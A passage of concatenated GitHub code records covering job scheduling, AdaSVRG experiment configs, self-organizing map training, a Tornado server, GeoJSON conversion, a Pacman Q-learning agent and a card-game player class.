reverse = True)\n \n print(jobs)\n maxx = 0\n for i in range(n):\n maxx = max(maxx, jobs[i][1])\n profit = 0\n \n slots = [-1 for _ in range(maxx+1)]\n for i in range(n):\n for j in range(jobs[i][1], 0, -1):\n if slots[j] == -1:\n slots[j] = i\n profit += jobs[i][2]\n break\n \n return profit\n\n\njobs = [(1,4,20),(2,1,10),(3,1,40),(4,1,30)]\nN = 
4\nprint(jobScheduling(jobs))","repo_name":"Bruces1998/DSA","sub_path":"greedy/job_scheduling.py","file_name":"job_scheduling.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74152683360","text":"from haven import haven_utils as hu\nimport itertools \nimport numpy as np\n\ndef get_benchmark(benchmark,\n opt_list,\n batch_size = 1,\n runs = [0,1,2,3,4],\n max_epoch=[50],\n losses=[\"logistic_loss\", \"squared_loss\", \"squared_hinge_loss\"]\n ):\n \n if benchmark in [\"mushrooms\", \"mushrooms_diagonal\"]:\n return {\"dataset\":[\"mushrooms\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./8000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"ijcnn\":\n return {\"dataset\":[\"ijcnn\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./35000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark in [\"a1a\", \"a1a_diagonal\"]:\n return {\"dataset\":[\"a1a\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./1600,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"a2a\":\n return {\"dataset\":[\"a2a\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./2300,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark in [\"w8a\", \"w8a_diagonal\"]:\n return {\"dataset\":[\"w8a\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./50000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"covtype\":\n return {\"dataset\":[\"covtype\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./500000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"phishing\":\n return {\"dataset\":[\"phishing\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1e-4,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"rcv1\":\n return {\"dataset\":[\"rcv1\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":1./20000,\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n \n elif benchmark == \"synthetic_interpolation\":\n return {\"dataset\":[\"synthetic\"],\n \"loss_func\": losses,\n \"opt\": opt_list,\n \"regularization_factor\":0.,\n \"margin\":[0.1],\n \"false_ratio\" : [0, 0.1, 0.2],\n \"n_samples\": [10000],\n \"d\": [200],\n \"batch_size\":batch_size,\n \"max_epoch\":max_epoch,\n \"runs\":runs}\n else:\n print(\"Benchmark unknown\")\n return\n \n\nEXP_GROUPS = {}\nMAX_EPOCH = 50\nRUNS = [0, 1, 2, 3, 4]\nbenchmarks_list = [\"mushrooms\", \"ijcnn\", \"a1a\", \"a2a\", \"w8a\", \"rcv1\", \"covtype\", \"phishing\"]\nbenchmarks_diagonal_list = [\"a1a_diagonal\", \"mushrooms_diagonal\", \"w8a_diagonal\"]\nbenchmarks_interpolation_list = [\"synthetic_interpolation\"]\n\nfor benchmark in benchmarks_list + benchmarks_diagonal_list + benchmarks_interpolation_list:\n EXP_GROUPS[\"exp_%s\" % benchmark] = []\n \n \n#=== Setting up scalar vs diagonal experiments ===\n\nfor batch_size in [64]:\n opt_list = []\n for variant in [\"diagonal\", \"scalar\"]:\n opt_list += [{'name':'AdaSVRG_General',\n 'r':1/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 
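# 0 runs the full inner loop each stage; the AdaSVRG entries further below use 'adaptive_termination':1 with 'threshold_at' to stop early.\n                      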
'adaptive_termination':0,\n 'variant':variant}]\n \n for benchmark in benchmarks_diagonal_list:\n EXP_GROUPS['exp_%s' % benchmark] += hu.cartesian_exp_group(get_benchmark(benchmark, opt_list, batch_size=batch_size, max_epoch=[50], runs=[0, 1, 2, 3, 4], losses=['logistic_loss']))\n\n#=== Setting up main experiments ===\n\nfor batch_size in [1, 8, 64, 128]:\n opt_list = []\n \n # Baseline optimizers\n for eta in [1e-3, 1e-2, 1e-1, 1, 10, 100]:\n \n opt_list += [{'name':'SVRG_BB',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n \n opt_list += [{'name':'SVRG',\n 'r':1/batch_size,\n 'adaptive_termination':0,\n 'init_step_size':eta}]\n \n opt_list += [{'name':'SVRG_Loopless',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n\n opt_list += [{'name':'SARAH',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n \n #AdaSVRG without adaptive termination\n opt_list += [{'name':'AdaSVRG',\n 'r':1/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 'adaptive_termination':0}]\n\n #AdaSVRG with adaptive termination\n opt_list += [{'name':'AdaSVRG',\n 'r':10/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 'adaptive_termination':1,\n 'threshold_at':0.5}]\n \n\n \n for benchmark in benchmarks_list:\n EXP_GROUPS['exp_%s' % benchmark] += hu.cartesian_exp_group(get_benchmark(benchmark, opt_list, batch_size=batch_size, max_epoch=[MAX_EPOCH], runs=RUNS, losses=['logistic_loss', 'squared_loss', 'huber_loss']))\n\n\n\n#=== Setting up interpolation experiment ===\n \nfor batch_size in [1, 8, 64, 128]:\n opt_list = []\n \n # Hybrid method\n opt_list +=[{'name':'AdaGrad_AdaSVRG', \n \"init_step_size\": 1000,\n \"r\":1/batch_size,\n \"max_epoch_sgd\":MAX_EPOCH, \n \"adaptive_termination\":1,\n \"threshold_at\": 0.5,\n \"linesearch_option_sgd_ada\":1}]\n \n # Find optimal manual switching\n for max_epoch_sgd in range(1, MAX_EPOCH):\n opt_list +=[{'name':'AdaGrad_AdaSVRG', \n \"init_step_size\": 1000,\n \"r\":1/batch_size,\n \"max_epoch_sgd\":max_epoch_sgd,\n \"adaptive_termination\":0,\n \"linesearch_option_sgd_ada\":1}]\n \n # Adagrad with linesearch\n opt_list +=[{'name':'AdaGrad', \n \"init_step_size\": 1000,\n \"r\":1/batch_size,\n \"linesearch_option\":1,\n \"beta\":0.7,\n \"c\":0.5}]\n \n # AdaSVRG without adaptive termination\n opt_list += [{'name':'AdaSVRG',\n 'r':1/batch_size,\n 'init_step_size':None,\n 'linesearch_option':1,\n 'adaptive_termination':0}]\n \n # SVRG\n for eta in [1e-4, 1e-3, 1e-2, 1e-1, 1, 10, 100, 1000]:\n opt_list += [{'name':'SVRG',\n 'r':1/batch_size,\n 'init_step_size':eta}]\n\n \n for benchmark in benchmarks_interpolation_list:\n EXP_GROUPS['exp_%s' % benchmark] += hu.cartesian_exp_group(get_benchmark(benchmark, opt_list=opt_list, batch_size=batch_size, runs=RUNS, losses=[\"squared_hinge_loss\", \"logistic_loss\"], max_epoch=[MAX_EPOCH])) \n\n \n","repo_name":"bpauld/AdaSVRG","sub_path":"exp_configs.py","file_name":"exp_configs.py","file_ext":"py","file_size_in_byte":7708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"41078157495","text":"#!/usr/bin/env python3\n\"\"\"\nTrain a reference SOM and optionally use that to transform the given\ndataset.\n\"\"\"\nimport logging\nimport json\nfrom collections import defaultdict\n\nimport pandas as pd\nfrom argmagic import argmagic\n\nfrom flowcat import utils, io_functions, sommodels\nfrom flowcat.dataset import case_dataset\nfrom flowcat.dataset.fcs import extract_name\n\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef transform_cases(dataset, model, output):\n 
\"\"\"Create individidual SOMs for all cases in the dataset.\n Args:\n dataset: CaseIterable with a number of cases, for which SOMs should be\n generated.\n model: Model with initial weights, which should be used for generation\n of SOMs.\n output: Output directory for SOMs\n\n Returns:\n Nothing.\n \"\"\"\n output.mkdir()\n casesamples = defaultdict(list)\n for case, somsample in utils.time_generator_logger(model.transform_generator(dataset)):\n sompath = output / f\"{case.id}_t{somsample.tube}.npy\"\n io_functions.save_som(somsample.data, sompath, save_config=False)\n somsample.data = None\n somsample.path = sompath\n casesamples[case.id].append(somsample)\n\n somcases = []\n for case in dataset:\n somcases.append(case.copy(samples=casesamples[case.id]))\n\n somcollection = case_dataset.CaseCollection(somcases)\n io_functions.save_json(somcollection, output + \".json\")\n\n labels = [{\"label\": case.id, \"randnum\": 0, \"group\": case.group} for case in dataset]\n # Save metadata into an additional csv file with the same name\n metadata = pd.DataFrame(labels)\n io_functions.save_csv(metadata, output + \".csv\")\n io_functions.save_json(\n {\n tube: {\n \"dims\": m.model.dims,\n \"channels\": m.model.markers,\n } for tube, m in model.models.items()\n }, output + \"_config.json\")\n\n\ndef train_model(\n dataset,\n markers=None,\n tensorboard=None,\n modelargs=None,\n) -> sommodels.casesom.CaseSom:\n \"\"\"Create and train a SOM model using the given dataset.\"\"\"\n if modelargs is None:\n modelargs = {\n \"marker_name_only\": False,\n \"max_epochs\": 10,\n \"batch_size\": 50000,\n \"initial_radius\": 16,\n \"end_radius\": 2,\n \"radius_cooling\": \"linear\",\n # \"marker_images\": sommodels.fcssom.MARKER_IMAGES_NAME_ONLY,\n \"map_type\": \"toroid\",\n \"dims\": (32, 32, -1),\n \"scaler\": \"MinMaxScaler\",\n }\n\n if markers:\n selected_markers = io_functions.load_json(markers)\n else:\n selected_markers = dataset.selected_markers\n # modify marker names if marker_name_only\n if modelargs.get(\"marker_name_only\", False):\n selected_markers = {\n tube: [extract_name(marker) for marker in markers]\n for tube, markers in selected_markers.items()\n }\n\n model = sommodels.casesom.CaseSom(\n tubes=selected_markers,\n tensorboard_dir=tensorboard,\n modelargs=modelargs,\n )\n model.train(dataset)\n return model\n\n\ndef main(\n data: utils.URLPath,\n meta: utils.URLPath,\n output: utils.URLPath,\n reference_ids: utils.URLPath = None,\n reference: utils.URLPath = None,\n tensorboard_dir: utils.URLPath = None,\n modelargs: json.loads = None,\n transargs: json.loads = None,\n mode: str = \"fit_transform\",\n):\n \"\"\"\n Train a SOM and use its weights to initialize individual SOM training.\n\n Args:\n data: Path to fcs data.\n meta: Path to dataset metadata, this should correctly reference fcs data.\n output: Path to output model and transformed cases.\n reference_ids: Optionally list ids to be used for reference SOM generation.\n reference: Optionally use pretrained model.\n modelargs: Optionally give specific options for reference SOM generation.\n transargs: Optionally give specific options for transforming individual SOMs.\n mode: Whether to fit or to transform. 
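Accepts \"fit\" (train the reference model and stop) or \"fit_transform\". 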
Default both.\n \"\"\"\n dataset = io_functions.load_case_collection(data, meta)\n\n if reference is None:\n reference_ids = io_functions.load_json(reference_ids)\n reference_dataset = dataset.filter(labels=reference_ids)\n print(\"Training reference SOM on\", reference_dataset)\n reference = train_model(reference_dataset, modelargs=modelargs)\n reference_output = output / \"reference\"\n io_functions.save_casesom(reference, reference_output)\n reference = reference_output\n\n if mode == \"fit\":\n return\n\n if transargs is None:\n transargs = {\n \"max_epochs\": 4,\n \"batch_size\": 50000,\n \"initial_radius\": 4,\n \"end_radius\": 1,\n }\n\n model = io_functions.load_casesom(\n reference,\n tensorboard_dir=tensorboard_dir,\n **transargs\n )\n\n som_output = output / \"som\"\n transform_cases(dataset, model, som_output)\n\n\nif __name__ == \"__main__\":\n handlers = [\n utils.create_handler(logging.StreamHandler(), level=logging.INFO)\n ]\n\n utils.add_logger(\"flowcat\", handlers, level=logging.DEBUG)\n utils.add_logger(LOGGER, handlers, level=logging.DEBUG)\n argmagic(main)\n","repo_name":"xiamaz/flowCat","sub_path":"scripts/01_generate_soms.py","file_name":"01_generate_soms.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"18871637218","text":"import tornado.ioloop\nimport tornado.web\nfrom tornado.options import define, options, parse_command_line\n\nfrom url import url\n\ndefine('port', default=8005, help='run on th given port', type=int)\ndefine('debug', default=False, help='run in debug mode')\n\ndef main():\n parse_command_line()\n app = tornado.web.Application(\n handlers=url,\n debug=options.debug,\n )\n app.listen(options.port)\n print(f'Development server is running at http://127.0.0.1:{options.port}/')\n print('Quit the server with Control-C')\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"microsoft/OneLabeler","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"54"} +{"seq_id":"35579259493","text":"\nDEVICE_ID_TO_LOC = {\n 'pi1': [6.562143, 46.518774, 0],\n 'pi2': [6.561868, 46.518270, 0],\n 'pi3': [6.563111, 46.518574, 0]\n}\n\nGET_STATS = {\n 'pi1': [20, 6],\n 'pi2': [20, 6],\n 'pi3': [20, 6]\n}\n\n\ndef to_geojson_format(item):\n \n count = item['count']\n timestamp = item['timestamp']\n deviceId = item['deviceId']\n \n location = DEVICE_ID_TO_LOC[deviceId]\n \n # avg_count, std_div_count = GET_STATS[deviceId]\n # import random\n # mag = random.randint(0, 6)#abs(count - avg_count) / std_div_count\n mag = count\n \n geo_item = {}\n geo_item['type'] = 'Feature'\n \n geo_item['properties'] = { \"id\": deviceId, \"mag\": mag, \"time\": timestamp, \"felt\": None, \"tsunami\": 0 }\n \n geo_item['geometry'] = { \"type\": \"Point\", \"coordinates\": location }\n \n return geo_item\n \n \ndef transform_to_geojson(items):\n \n geojson_items = {}\n \n geojson_items['type'] = \"FeatureCollection\"\n \n geojson_items['crs'] = { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\" } }\n \n \n geojson_items['features'] = []\n \n for item in items:\n geo_item = to_geojson_format(item)\n geojson_items['features'].append(geo_item)\n \n return 
geojson_items","repo_name":"Nacho114/crowdbase","sub_path":"server/getCrowdData/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71667815201","text":"# qlearningAgents.py\n# ------------------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n#\n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom game import *\nfrom learningAgents import ReinforcementAgent\nfrom featureExtractors import *\n\nimport random, util, math\nfrom collections import defaultdict\nimport pickle\nimport numpy as np\nimport os\n\n\n\n\nq_per_move=[]\nq_per_episode=[]\n\n# if not os.path.exists('./q_diff.pickle'):\n# epsilone_q = dict()\n# with open('q_diff.pickle', 'wb') as f:\n# pickle.dump(ep, f, pickle.HIGHEST_PROTOCOL)\n\nif not os.path.exists('./q_diff_alpha.pickle'):\n epsilone_q = dict()\n with open('q_diff_alpha.pickle', 'wb') as f:\n pickle.dump(epsilone_q, f, pickle.HIGHEST_PROTOCOL)\n\n\n\n\n\n\nclass QLearningAgent(ReinforcementAgent):\n \"\"\"\n Q-Learning Agent\n\n Functions you should fill in:\n - computeValueFromQValues\n - computeActionFromQValues\n - getQValue\n - getAction\n - update\n\n Instance variables you have access to\n - self.epsilon (exploration prob)\n - self.alpha (learning rate)\n - self.discount (discount rate)\n\n Functions you should use\n - self.getLegalActions(state)\n which returns legal actions for a state\n \"\"\"\n\n def __init__(self, **args):\n \"You can initialize Q-values here...\"\n ReinforcementAgent.__init__(self, **args)\n\n \"*** YOUR CODE HERE ***\"\n self.Q = util.Counter()\n\n def getQValue(self, state, action):\n \"\"\"\n Returns Q(state,action)\n Should return 0.0 if we have never seen a state\n or the Q node value otherwise\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n return self.Q[(state, action)]\n\n def computeValueFromQValues(self, state):\n \"\"\"\n Returns max_action Q(state,action)\n where the max is over legal actions. Note that if\n there are no legal actions, which is the case at the\n terminal state, you should return a value of 0.0.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n actions = self.getLegalActions(state)\n\n tmp_dict = util.Counter()\n\n for action in actions:\n tmp_dict[action] = self.getQValue(state, action)\n return tmp_dict[tmp_dict.argMax()]\n\n def computeActionFromQValues(self, state):\n \"\"\"\n Compute the best action to take in a state. Note that if there\n are no legal actions, which is the case at the terminal state,\n you should return None.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n actions = self.getLegalActions(state)\n\n tmp_dict = util.Counter()\n for action in actions:\n tmp_dict[action] = self.getQValue(state, action)\n return tmp_dict.argMax()\n\n def getAction(self, state):\n \"\"\"\n Compute the action to take in the current state. With\n probability self.epsilon, we should take a random action and\n take the best policy action otherwise. 
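This is the standard epsilon-greedy rule for balancing exploration against exploitation. 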
Note that if there are\n no legal actions, which is the case at the terminal state, you\n should choose None as the action.\n\n HINT: You might want to use util.flipCoin(prob)\n HINT: To pick randomly from a list, use random.choice(list)\n \"\"\"\n # Pick Action\n legalActions = self.getLegalActions(state)\n action = None\n \"*** YOUR CODE HERE ***\"\n\n '''\n With probability epsilon take a random action; otherwise follow the greedy policy.\n '''\n if util.flipCoin(self.epsilon):\n action = random.choice(legalActions)\n else:\n action = self.computeActionFromQValues(state)\n\n return action\n\n def update(self, state, action, nextState, reward):\n \"\"\"\n The parent class calls this to observe a\n state = action => nextState and reward transition.\n You should do your Q-Value update here\n\n NOTE: You should never call this function,\n it will be called on your behalf\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n self.Q[(state, action)] = (1 - self.alpha) * self.Q[(state, action)] + self.alpha * (\n reward + self.discount * self.computeValueFromQValues(nextState))\n\n def getPolicy(self, state):\n return self.computeActionFromQValues(state)\n\n def getValue(self, state):\n return self.computeValueFromQValues(state)\n\n\nclass PacmanQAgent(QLearningAgent):\n \"Exactly the same as QLearningAgent, but with different default parameters\"\n\n def __init__(self, epsilon=0.05, gamma=0.8, alpha=0.2, numTraining=0, **args):\n \"\"\"\n These default parameters can be changed from the pacman.py command line.\n For example, to change the exploration rate, try:\n python pacman.py -p PacmanQLearningAgent -a epsilon=0.1\n\n alpha - learning rate\n epsilon - exploration rate\n gamma - discount factor\n numTraining - number of training episodes, i.e. no learning after these many episodes\n \"\"\"\n args['epsilon'] = epsilon\n args['gamma'] = gamma\n args['alpha'] = alpha\n args['numTraining'] = numTraining\n self.index = 0 # This is always Pacman\n QLearningAgent.__init__(self, **args)\n\n def getAction(self, state):\n \"\"\"\n Simply calls the getAction method of QLearningAgent and then\n informs parent of action for Pacman. Do not change or remove this\n method.\n \"\"\"\n action = QLearningAgent.getAction(self, state)\n self.doAction(state, action)\n return action\n\n\nclass ApproximateQAgent(PacmanQAgent):\n \"\"\"\n ApproximateQLearningAgent\n\n You should only have to overwrite getQValue\n and update. 
All other QLearningAgent functions\n should work as is.\n \"\"\"\n\n def __init__(self, extractor='IdentityExtractor', **args):\n self.featExtractor = util.lookup(extractor, globals())()\n PacmanQAgent.__init__(self, **args)\n self.weights = util.Counter()\n # self.epsilon=0.02\n # self.alpha=0.05\n self.cum_weights = defaultdict(list)\n\n def getWeights(self):\n return self.weights\n\n def getQValue(self, state, action):\n \"\"\"\n Should return Q(state,action) = w * featureVector\n where * is the dotProduct operator\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n features = self.featExtractor.getFeatures(state, action)\n ret = 0\n for i in features.keys():\n ret = ret + self.weights[i] * features[i]\n\n return ret\n\n def update(self, state, action, nextState, reward):\n \"\"\"\n Should update your weights based on transition\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n diff = reward + self.discount * self.getValue(nextState) - self.getQValue(state, action)\n q_per_move.append(diff)\n\n features = self.featExtractor.getFeatures(state, action)\n for key in features.keys():\n self.weights[key] = self.weights[key] + self.alpha * diff * features[key]\n \"*** DO NOT DELETE BELOW ***\"\n self.write()\n\n def write(self):\n \"\"\"\n DO NOT DELETE\n \"\"\"\n for i in [\"bias\", \"#-of-ghosts-1-step-away\", \"eats-food\", \"closest-food\"]:\n self.cum_weights[i].append(self.weights[i])\n\n def save(self):\n \"\"\"\n DO NOT DELETE\n \"\"\"\n\n with open('./cmu_weights.pkl', 'wb') as f:\n pickle.dump(self.cum_weights, f)\n\n '''\n The code below stores the per-episode diff values for the alpha/epsilon setting being tested.\n '''\n\n # with open('./q_diff.pickle', 'rb') as f:\n # ep = pickle.load(f)\n #\n # with open('./q_diff.pickle', 'wb') as f:\n # print(self.epsilon)\n # ep[0.05] = q_per_episode\n # pickle.dump(ep, f, pickle.HIGHEST_PROTOCOL)\n with open('./q_diff_alpha.pickle', 'rb') as f:\n ep = pickle.load(f)\n\n with open('./q_diff_alpha.pickle', 'wb') as f:\n print(self.epsilon)\n ep[1] = q_per_episode\n pickle.dump(ep, f, pickle.HIGHEST_PROTOCOL)\n\n def final(self, state):\n \"Called at the end of each game.\"\n # call the super-class final method\n PacmanQAgent.final(self, state)\n\n '''\n Average the per-move diffs over the finished episode.\n '''\n average = sum(q_per_move) / len(q_per_move)\n q_per_episode.append(average)\n q_per_move.clear()\n\n # did we finish training?\n if self.episodesSoFar == self.numTraining:\n # you might want to print your weights here for debugging\n \"*** YOUR CODE HERE ***\"\n pass\n\n \"*** DO NOT DELETE BELOW ***\"\n self.save()\n","repo_name":"LEE-JAE-HYUN179/AI_assignment-cs188-","sub_path":"finalproject/AI_final/qlearningAgents.py","file_name":"qlearningAgents.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2999114672","text":"from collections import deque\nfrom functools import reduce\nfrom random import choice, randint\n\nfrom character_utils import character_by_name\nfrom discards import Discards\nfrom dummy import DummyAgent, Dummy\nfrom selection import Pair\ntry:\n from user import UserAgentCLI\nexcept ImportError:\n print('skipping UserAgentCLI import')\nfrom utils import (choose_random_valid_behavior, get_possible)\n\n\nclass Player:\n def __init__(self, name, is_ai):\n self.name = name\n self.is_ai = is_ai\n self.life = 20\n self.position = None\n self.finisher = None\n self.ante_finisher = False\n self.discards = Discards(2)\n self.played_styles = []\n self.played_bases = []\n self.selection = None\n self.active = False\n 
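# A minimal standalone sketch (not from either repository above) of the tabular rule in
# QLearningAgent.update: Q(s,a) <- (1 - alpha) * Q(s,a) + alpha * (reward + gamma * max_a' Q(s',a')).
# `legal_next_actions` is a hypothetical stand-in for self.getLegalActions(nextState);
# alpha and gamma mirror PacmanQAgent's defaults.
from collections import defaultdict

Q = defaultdict(float)   # (state, action) -> value; unseen pairs default to 0.0
alpha, gamma = 0.2, 0.8  # learning rate and discount factor

def q_update(state, action, next_state, reward, legal_next_actions):
    # Value of the successor state: max over its legal actions, 0.0 at terminal states.
    best_next = max((Q[(next_state, a)] for a in legal_next_actions), default=0.0)
    Q[(state, action)] = (1 - alpha) * Q[(state, action)] + alpha * (reward + gamma * best_next)

# usage: one observed transition
q_update('s0', 'east', 's1', reward=-1.0, legal_next_actions=['east', 'west'])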
self.modifiers = []\n self.refresh()\n\n if name == 'Training Dummy':\n self.character = Dummy()\n self.agent = DummyAgent()\n self.life = float('inf')\n else:\n self.character = character_by_name(name)\n if self.character is None:\n self.character = character_by_name('Simple Bob')\n\n if self.is_ai:\n self.agent = DummyAgent()\n else:\n self.agent = UserAgentCLI()\n\n def __str__(self):\n return self.name + '(' + str(self.life) + ')'\n\n @property\n def status(self):\n return {\n 'life': self.life,\n 'position': self.position\n }\n\n @property\n def soak(self):\n return self.get_mod_val('soak')\n\n @property\n def stun_guard(self):\n return self.get_mod_val('stun_guard')\n\n @property\n def stun_immune(self):\n return self.get_mod_val('stun_immune', False)\n\n @property\n def can_hit(self):\n return self.get_mod_val('can_hit', True)\n\n @property\n def dodge(self):\n return self.get_mod_val('dodge', False)\n\n @property\n def power(self):\n return self.get_mod_val('power')\n\n @property\n def priority(self):\n return self.get_mod_val('priority')\n\n @property\n def atk_range(self):\n if self.selection.atk_range is not None:\n def range_val(range_mod): return range_mod.val\n range_mods = self.get_relevant_mods('range')\n range_mods = list(map(range_val, range_mods))\n range_mods.append(self.selection.atk_range)\n combos = [[]]\n for m in range_mods:\n t = []\n for y in m:\n for i in combos:\n t.append(i+[y])\n combos = t\n return sorted(set([sum(c) for c in combos]))\n else:\n return None\n\n def get_mod_val(self, mtype, default=0):\n relevant = self.get_relevant_mods(mtype)\n if len(relevant) == 0:\n return default\n\n if isinstance(default, bool):\n for m in relevant:\n if m.val != default:\n return m.val\n return default\n elif isinstance(default, (int, float)):\n return reduce((lambda acc, m: acc+m.val), relevant, default)\n else:\n print('Unexpected Mod mtype/def: {} {}'.format(mtype, default))\n return None\n\n def get_relevant_mods(self, mtype):\n def f(m): return m.mtype == mtype\n return list(filter(f, self.modifiers))\n\n def refresh(self):\n self.stunned = False\n self.actions = []\n self.update_modifiers()\n\n def update_modifiers(self):\n for i in range(len(self.modifiers)):\n if self.modifiers[i].onset == 0:\n self.modifiers[i].duration -= 1\n else:\n self.modifiers[i].onset -= 1\n\n def f(m): return m.duration > 0\n self.modifiers = list(filter(f, self.modifiers))\n\n def get_ante(self, state):\n if self.finisher is not None and self.life <= 7:\n if hasattr(self.agent, 'get_ante'):\n if self.agent.get_ante(state) == 'Finisher':\n self.ante_finisher = True\n return self.finisher\n else:\n if randint(0, 2) == 2:\n self.ante_finisher = True\n return self.finisher\n return None\n\n def get_ante_effects(self):\n if hasattr(self.character, 'get_ante_effects'):\n return self.character.get_ante_effects()\n else:\n return None\n\n def discard(self, to_discard):\n self.discard_inner(to_discard)\n\n def discard_inner(self, to_discard):\n self.discards.discard_inner(to_discard)\n\n def discard_outer(self, to_discard):\n self.discards.discard_outer(to_discard)\n\n def select_finisher(self, state):\n if hasattr(self.character, 'finishers'):\n options = self.character.finishers\n if hasattr(self.agent, 'select_finisher'):\n self.finisher = self.agent.select_finisher(options, state)\n else:\n self.finisher = choice(options)\n\n def init_discards(self, state):\n styles = self.character.styles\n bases = self.character.bases\n if hasattr(self.agent, 'init_discards'):\n to_discard = 
self.agent.init_discards(styles, bases, state)\n self.discard_outer([\n styles[to_discard[0]],\n bases[to_discard[2]]\n ])\n self.discard([\n styles[to_discard[1]],\n bases[to_discard[3]]\n ])\n else:\n self.discard_outer([\n styles[0],\n bases[0]\n ])\n self.discard([\n styles[1],\n bases[1]\n ])\n\n def recover_discards(self):\n self.discards.cycle_out()\n\n def recycle(self):\n if self.ante_finisher:\n self.ante_finisher = False\n self.finisher = None\n else:\n self.recover_discards()\n self.discard(self.played_styles.pop())\n self.discard(self.played_bases.pop())\n self.played_styles = []\n self.played_bases = []\n self.selection = None\n\n def get_selection(self, state):\n av_s = self.available_styles\n av_b = self.available_bases\n if hasattr(self.agent, 'get_selection'):\n style, base = self.agent.get_selection(av_s, av_b, state)\n else:\n style = choice(av_s)\n base = choice(av_b)\n self.played_styles.append(style)\n self.played_bases.append(base)\n return Pair(style, base)\n\n def get_new_base(self, state):\n av_b = self.available_bases\n if hasattr(self.agent, 'get_new_base'):\n base = self.agent.get_new_base(av_b, state)\n else:\n base = choice(self.available_bases)\n self.played_bases.append(base)\n return base\n\n @property\n def available_styles(self):\n opts = self.character.styles\n discarded = self.discards.styles\n played = self.played_styles\n return [s for s in opts if s not in discarded and s not in played]\n\n @property\n def available_bases(self):\n opts = self.character.bases\n discarded = self.discards.bases\n played = self.played_bases\n return [b for b in opts if b not in discarded and b not in played]\n\n def has_playable_styles(self):\n return len(self.available_styles) > 0\n\n def has_playable_bases(self):\n return len(self.available_bases) > 0\n\n def handle_modifier(self, mod):\n if mod.mtype == 'stun' and not self.stun_immune:\n self.stunned = True\n elif callable(mod.mtype):\n mod.mtype(mod.val)\n elif mod.mtype == 'lose_life':\n if self.life - mod.val > 0:\n self.life -= mod.val\n else:\n self.life = 1\n else:\n self.modifiers.append(mod)\n\n def get_selection_effects(self):\n return self.selection.get_effects()\n\n def grant_action(self, action):\n self.actions.append(action)\n\n def remove_action(self, action):\n self.actions.remove(action)\n\n def get_effects(self, trigger, passed_selection=None):\n if self.selection is not None:\n return self.selection.get_effects(trigger)\n else:\n return passed_selection.get_effects(trigger)\n\n def get_actions(self, trigger):\n return get_possible(self.selection, trigger)\n\n def get_behavior(self, actions, state, trigger):\n if hasattr(self.agent, 'get_behavior'):\n chosen, b = self.agent.get_behavior(actions, state, trigger)\n else:\n chosen, b = choose_random_valid_behavior(actions, state)\n return chosen, b\n\n def handle_damage(self, damage, attacker):\n if damage > 0:\n damage = self.soak_damage(damage)\n if damage > self.stun_guard and not self.stun_immune:\n self.stunned = True\n self.life -= damage\n return damage\n\n # Returns leftover un-soaked damage\n def soak_damage(self, damage):\n damage = damage - self.soak\n if damage > 0:\n return damage\n else:\n return 